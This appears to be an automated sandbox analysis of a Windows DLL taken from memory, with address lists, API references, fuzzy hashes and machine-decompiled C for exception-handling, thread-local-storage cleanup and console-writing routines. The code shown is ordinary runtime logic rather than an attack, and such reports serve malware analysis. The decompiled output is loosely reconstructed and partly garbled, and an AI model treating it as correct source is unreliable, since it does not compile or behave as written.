                          0x6eced2c3
                          0x6eced2c4
                          0x6eced2c7
                          0x6eced2ca
                          0x6eced2cd
                          0x6eced2d0
                          0x6eced2d0
                          0x6eced2d9
                          0x6eced2dc
                          0x6eced2dc
                          0x6eced1f4
                          0x6eced2df
                          0x6eced2e3
                          0x6eced2e5
                          0x6eced2e8
                          0x6eced2ee
                          0x6eced2ee
                          0x6eced2f6
                          0x6eced2fb
                          0x6eced369
                          0x6eced369
                          0x6eced36e
                          0x6eced372
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced2fd
                          0x6eced2fd
                          0x6eced301
                          0x6eced313
                          0x6eced316
                          0x6eced319
                          0x6eced31b
                          0x6eced332
                          0x6eced336
                          0x6eced33c
                          0x6eced33d
                          0x6eced33f
                          0x00000000
                          0x6eced341
                          0x00000000
                          0x6eced341
                          0x6eced31d
                          0x6eced322
                          0x6eced325
                          0x6eced32a
                          0x6eced32d
                          0x00000000
                          0x6eced32d
                          0x6eced303
                          0x6eced306
                          0x6eced309
                          0x6eced30b
                          0x00000000
                          0x6eced30d
                          0x6eced30d
                          0x6eced311
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced311
                          0x6eced30b
                          0x6eced301
                          0x6eced1ab
                          0x6eced1ab
                          0x6eced1b2
                          0x00000000
                          0x6eced1b4
                          0x6eced1b4
                          0x6eced1bb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced1bb
                          0x6eced1b2
                          0x6eced1a9
                          0x6eced19c
                          0x6eced11c
                          0x6eced124
                          0x6eced127
                          0x6eced12c
                          0x6eced130
                          0x6eced133
                          0x6eced139
                          0x6eced13c
                          0x00000000
                          0x6eced13e
                          0x6eced13e
                          0x6eced141
                          0x6eced143
                          0x6eced379
                          0x6eced379
                          0x00000000
                          0x6eced149
                          0x6eced151
                          0x6eced15c
                          0x00000000
                          0x00000000
                          0x6eced165
                          0x6eced168
                          0x6eced169
                          0x6eced16c
                          0x6eced16e
                          0x00000000
                          0x6eced174
                          0x00000000
                          0x6eced174
                          0x00000000
                          0x6eced16e
                          0x6eced149
                          0x6eced37e
                          0x6eced37e
                          0x6eced380
                          0x6eced381
                          0x6eced388
                          0x6eced38b
                          0x6eced399
                          0x6eced39e
                          0x6eced3a3
                          0x6eced3a6
                          0x6eced3ab
                          0x6eced3ae
                          0x6eced3b1
                          0x6eced3b3
                          0x6eced3b5
                          0x6eced3b5
                          0x6eced3ba
                          0x6eced3c6
                          0x6eced3cc
                          0x6eced3d1
                          0x6eced3d4
                          0x6eced3d5
                          0x00000000
                          0x6eced3d5
                          0x6eced13c
                          0x6eced11a
                          0x6eced0da
                          0x6eced0bb
                          0x6eced0ad
                          0x6eced079

                          APIs
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6ECED133
                          • type_info::operator==.LIBVCRUNTIME ref: 6ECED155
                          • ___TypeMatch.LIBVCRUNTIME ref: 6ECED264
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6ECED336
                          • _UnwindNestedFrames.LIBCMT ref: 6ECED3BA
                          • CallUnexpected.LIBVCRUNTIME ref: 6ECED3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2123188842-393685449
                          • Opcode ID: a50ec9151e3c74ec3319d2d329bb698ef8d34e78dd3b89d1efcd98b3f4590d90
                          • Instruction ID: e29b7244e23cc65f1919fbe58de170931f53d29753369f09c1f3a3b53608b069
                          • Opcode Fuzzy Hash: a50ec9151e3c74ec3319d2d329bb698ef8d34e78dd3b89d1efcd98b3f4590d90
                          • Instruction Fuzzy Hash: 8BB1677180024AEFCF05CFE4C98199EBFB9FF84314B10455AE8146BA19E331DA51CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC500, Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E6ECDC500() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6ed2adcc; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6ed2adcc; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6ed2adcc; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6ed2adcc; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6ed2adcc; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6ed27100; // 0x70
					return _t26;
				}
			}




















                          0x6ecdc504
                          0x6ecdc50b
                          0x6ecdc515
                          0x6ecdc51d
                          0x00000000
                          0x00000000
                          0x6ecdc529
                          0x6ecdc537
                          0x6ecdc53a
                          0x6ecdc53e
                          0x6ecdc547
                          0x6ecdc54e
                          0x6ecdc551
                          0x6ecdc554
                          0x6ecdc554
                          0x6ecdc530
                          0x6ecdc533
                          0x6ecdc55b
                          0x00000000
                          0x00000000
                          0x6ecdc561
                          0x6ecdc569
                          0x00000000
                          0x00000000
                          0x6ecdc56f
                          0x6ecdc587
                          0x6ecdc58a
                          0x6ecdc58e
                          0x6ecdc597
                          0x6ecdc59e
                          0x6ecdc5a1
                          0x6ecdc5a4
                          0x6ecdc5a4
                          0x6ecdc580
                          0x6ecdc583
                          0x6ecdc5ab
                          0x00000000
                          0x00000000
                          0x6ecdc5b1
                          0x6ecdc5b9
                          0x00000000
                          0x00000000
                          0x6ecdc5bb
                          0x6ecdc5c7
                          0x6ecdc5ca
                          0x6ecdc5ce
                          0x6ecdc5d7
                          0x6ecdc5de
                          0x6ecdc5e1
                          0x6ecdc5e4
                          0x6ecdc5e4
                          0x6ecdc5c0
                          0x6ecdc5c3
                          0x6ecdc5eb
                          0x00000000
                          0x00000000
                          0x6ecdc5ed
                          0x6ecdc5f5
                          0x00000000
                          0x00000000
                          0x6ecdc5f7
                          0x6ecdc607
                          0x6ecdc60a
                          0x6ecdc60e
                          0x6ecdc617
                          0x6ecdc61e
                          0x6ecdc621
                          0x6ecdc624
                          0x6ecdc624
                          0x6ecdc600
                          0x6ecdc603
                          0x6ecdc62b
                          0x6ecdc639
                          0x6ecdc644
                          0x6ecdc64b
                          0x6ecdc64f
                          0x6ecdc658
                          0x6ecdc65f
                          0x6ecdc662
                          0x6ecdc662
                          0x6ecdc641
                          0x6ecdc641
                          0x6ecdc644
                          0x00000000
                          0x6ecdc62d
                          0x6ecdc62d
                          0x6ecdc62d
                          0x6ecdc636
                          0x6ecdc636

                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC53A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC547
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC58A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC597
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC5CA
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC5D7
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC60A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC617
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC64B
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC658
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: ba70f20847e7e4e99effd72b961d36e64acc68ef87d021c5d91c37f7dcc6bcbf
                          • Instruction ID: 3a94f7902585b0dda4796c0a46ef4170d90c2379940ee92e0df9653b94350c18
                          • Opcode Fuzzy Hash: ba70f20847e7e4e99effd72b961d36e64acc68ef87d021c5d91c37f7dcc6bcbf
                          • Instruction Fuzzy Hash: 45419A7224524AAFEB506EE69D10F9E3724EF12341F046024EF258E154F773DA2AEB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE1DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E6ECE1DA0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6ECD3820( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6ed1cd60; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6ed1e0bc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6ed1e0f4);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6ECD3820( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = L6ECE28E0(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = L6ECE2620(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6ECF72E0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq", 0x3a, 0x6ed1e05c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6ECF6E20(_t96,  &M6ED1D3AA, 0x23, _t133, _t135, __eflags, 0x6ed1d454);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6ed1cd60) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6ed1e0c4);
													L45:
													E6ECF6DB0(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6ECD3820( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6ed1e0bc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6ed1e0d4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															L6ECE2620(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6ed1e0e4);
																	_push(_t156);
																	L48:
																	E6ECF73F0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6ece22a8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}













































                          0x6ece1da0
                          0x6ece1da1
                          0x6ece1da2
                          0x6ece1da4
                          0x6ece1da7
                          0x6ece1dab
                          0x6ece1daf
                          0x6ece1dce
                          0x00000000
                          0x6ece1db1
                          0x6ece1db1
                          0x6ece1db5
                          0x6ece1dbd
                          0x6ece1ddd
                          0x00000000
                          0x6ece1dbf
                          0x6ece1dbf
                          0x6ece1dc4
                          0x6ece1dfe
                          0x6ece1e08
                          0x6ece1e0e
                          0x6ece1e10
                          0x6ece1e69
                          0x6ece1e6b
                          0x00000000
                          0x6ece1e71
                          0x6ece1e71
                          0x6ece1e83
                          0x6ece1e89
                          0x6ece1e8b
                          0x6ece1f05
                          0x6ece1f0b
                          0x6ece1f0b
                          0x6ece1f0d
                          0x6ece1e8d
                          0x6ece1e8d
                          0x6ece1e91
                          0x6ece1e93
                          0x6ece1e93
                          0x6ece1f12
                          0x6ece1f14
                          0x6ece1f17
                          0x00000000
                          0x6ece1f17
                          0x6ece1e12
                          0x6ece1e16
                          0x6ece1e1a
                          0x6ece1e1c
                          0x6ece1e97
                          0x6ece1ea8
                          0x6ece1eab
                          0x6ece1eac
                          0x6ece1eb1
                          0x6ece1eb4
                          0x6ece1eb9
                          0x6ece1f1f
                          0x6ece1f23
                          0x00000000
                          0x6ece1ebb
                          0x6ece1ebb
                          0x6ece1ec0
                          0x6ece1f99
                          0x6ece1f9c
                          0x6ece1f9c
                          0x6ece1fa3
                          0x6ece1fa6
                          0x6ece1fdb
                          0x6ece1fdb
                          0x6ece1fe2
                          0x00000000
                          0x6ece1fa8
                          0x6ece1fa8
                          0x6ece1faa
                          0x00000000
                          0x6ece1fac
                          0x6ece1fac
                          0x6ece1fb0
                          0x6ece1fb2
                          0x00000000
                          0x6ece1fb2
                          0x6ece1faa
                          0x00000000
                          0x6ece1ec6
                          0x6ece1ec6
                          0x6ece1eca
                          0x6ece1ecc
                          0x6ece2035
                          0x6ece2037
                          0x6ece2039
                          0x00000000
                          0x6ece1ed2
                          0x6ece1ed6
                          0x6ece1eda
                          0x6ece1edb
                          0x6ece1ee0
                          0x6ece1ee5
                          0x6ece1eea
                          0x6ece1f27
                          0x6ece1f2b
                          0x6ece1f2c
                          0x6ece1f2d
                          0x6ece1f32
                          0x00000000
                          0x6ece1f32
                          0x6ece1ecc
                          0x6ece1ec0
                          0x6ece1e1e
                          0x6ece1e1e
                          0x6ece1e20
                          0x6ece2004
                          0x6ece2009
                          0x6ece200c
                          0x6ece200e
                          0x6ece201d
                          0x6ece2022
                          0x6ece2025
                          0x00000000
                          0x6ece1e26
                          0x6ece1e26
                          0x6ece1e28
                          0x6ece1e31
                          0x6ece1e34
                          0x6ece1eee
                          0x00000000
                          0x6ece1e3a
                          0x6ece1e3a
                          0x6ece1e41
                          0x6ece1e43
                          0x6ece1e46
                          0x6ece1e4a
                          0x6ece1e51
                          0x6ece1e53
                          0x6ece1e57
                          0x6ece1f3a
                          0x6ece1f3d
                          0x6ece1f40
                          0x6ece2027
                          0x6ece2027
                          0x6ece2029
                          0x6ece202e
                          0x6ece203e
                          0x6ece203e
                          0x6ece2043
                          0x6ece2046
                          0x00000000
                          0x6ece1f46
                          0x6ece1f4c
                          0x6ece1f4d
                          0x6ece1f52
                          0x6ece1f55
                          0x6ece1f5a
                          0x6ece1f5e
                          0x6ece1ef2
                          0x6ece1ef2
                          0x6ece1ef9
                          0x00000000
                          0x6ece1f60
                          0x6ece1f60
                          0x6ece1f64
                          0x6ece1f68
                          0x6ece1f6a
                          0x6ece1f6d
                          0x6ece2048
                          0x6ece2048
                          0x6ece204c
                          0x6ece204e
                          0x6ece2056
                          0x6ece205f
                          0x00000000
                          0x6ece1f73
                          0x6ece1f73
                          0x6ece1f7b
                          0x6ece1f7c
                          0x6ece1f7d
                          0x6ece1f82
                          0x6ece1f85
                          0x6ece1f8a
                          0x6ece1fb8
                          0x6ece1fbc
                          0x6ece1fbf
                          0x6ece1fc1
                          0x6ece1fc5
                          0x6ece2062
                          0x6ece2066
                          0x6ece2068
                          0x6ece2070
                          0x6ece2075
                          0x6ece2076
                          0x6ece2076
                          0x6ece207e
                          0x6ece2081
                          0x6ece2086
                          0x6ece2089
                          0x6ece208f
                          0x6ece20b5
                          0x6ece20bb
                          0x6ece20d9
                          0x6ece20df
                          0x6ece2152
                          0x6ece2158
                          0x6ece220e
                          0x6ece2214
                          0x00000000
                          0x6ece2216
                          0x6ece2216
                          0x6ece221c
                          0x00000000
                          0x6ece221e
                          0x6ece221e
                          0x6ece2224
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ece2224
                          0x6ece221c
                          0x6ece215e
                          0x6ece215e
                          0x6ece2164
                          0x00000000
                          0x6ece216a
                          0x6ece216a
                          0x6ece2170
                          0x00000000
                          0x6ece2176
                          0x6ece2176
                          0x6ece217c
                          0x00000000
                          0x6ece2182
                          0x00000000
                          0x6ece2182
                          0x6ece217c
                          0x6ece2170
                          0x6ece2164
                          0x6ece20e1
                          0x6ece20e1
                          0x6ece20e7
                          0x6ece21d0
                          0x6ece21d6
                          0x6ece2251
                          0x6ece21d8
                          0x6ece21d8
                          0x6ece21de
                          0x6ece22a1
                          0x6ece21e4
                          0x6ece21e4
                          0x6ece21ea
                          0x00000000
                          0x6ece21ec
                          0x00000000
                          0x6ece21ec
                          0x6ece21ea
                          0x6ece21de
                          0x6ece20ed
                          0x6ece20ed
                          0x6ece20f3
                          0x6ece228d
                          0x6ece20f9
                          0x6ece20f9
                          0x6ece20ff
                          0x6ece2291
                          0x6ece2105
                          0x6ece2105
                          0x6ece210b
                          0x00000000
                          0x6ece2111
                          0x6ece2114
                          0x6ece2114
                          0x6ece210b
                          0x6ece20ff
                          0x6ece20f3
                          0x6ece20e7
                          0x6ece20bd
                          0x6ece20bd
                          0x6ece20c3
                          0x6ece20c6
                          0x6ece20d3
                          0x6ece20d3
                          0x6ece21be
                          0x6ece21c1
                          0x00000000
                          0x6ece21c3
                          0x6ece21c3
                          0x6ece21c9
                          0x00000000
                          0x6ece21cb
                          0x00000000
                          0x6ece21cb
                          0x6ece21c9
                          0x6ece21c1
                          0x6ece2091
                          0x6ece2091
                          0x6ece2097
                          0x6ece2115
                          0x6ece211b
                          0x6ece2187
                          0x6ece218d
                          0x6ece2232
                          0x6ece2238
                          0x6ece2249
                          0x6ece223a
                          0x6ece223a
                          0x6ece2240
                          0x00000000
                          0x6ece2242
                          0x6ece2245
                          0x6ece2245
                          0x6ece2240
                          0x6ece2193
                          0x6ece2193
                          0x6ece2199
                          0x6ece229d
                          0x6ece219f
                          0x6ece219f
                          0x6ece21a5
                          0x6ece224d
                          0x6ece21ab
                          0x6ece21ab
                          0x6ece21b1
                          0x00000000
                          0x6ece21b3
                          0x00000000
                          0x6ece21b3
                          0x6ece21b1
                          0x6ece21a5
                          0x6ece2199
                          0x6ece211d
                          0x6ece211d
                          0x6ece2123
                          0x6ece21f1
                          0x6ece21f7
                          0x00000000
                          0x6ece21f9
                          0x6ece21f9
                          0x6ece21ff
                          0x00000000
                          0x6ece2201
                          0x6ece2201
                          0x6ece2207
                          0x00000000
                          0x6ece2209
                          0x00000000
                          0x6ece2209
                          0x6ece2207
                          0x6ece21ff
                          0x6ece2129
                          0x6ece2129
                          0x6ece212f
                          0x6ece2295
                          0x6ece2135
                          0x6ece2135
                          0x6ece213b
                          0x6ece2299
                          0x6ece2141
                          0x6ece2141
                          0x6ece2147
                          0x6ece2226
                          0x6ece2229
                          0x6ece214d
                          0x00000000
                          0x6ece214d
                          0x6ece2147
                          0x6ece213b
                          0x6ece212f
                          0x6ece2123
                          0x6ece2099
                          0x6ece2099
                          0x6ece209c
                          0x6ece20a2
                          0x6ece20a8
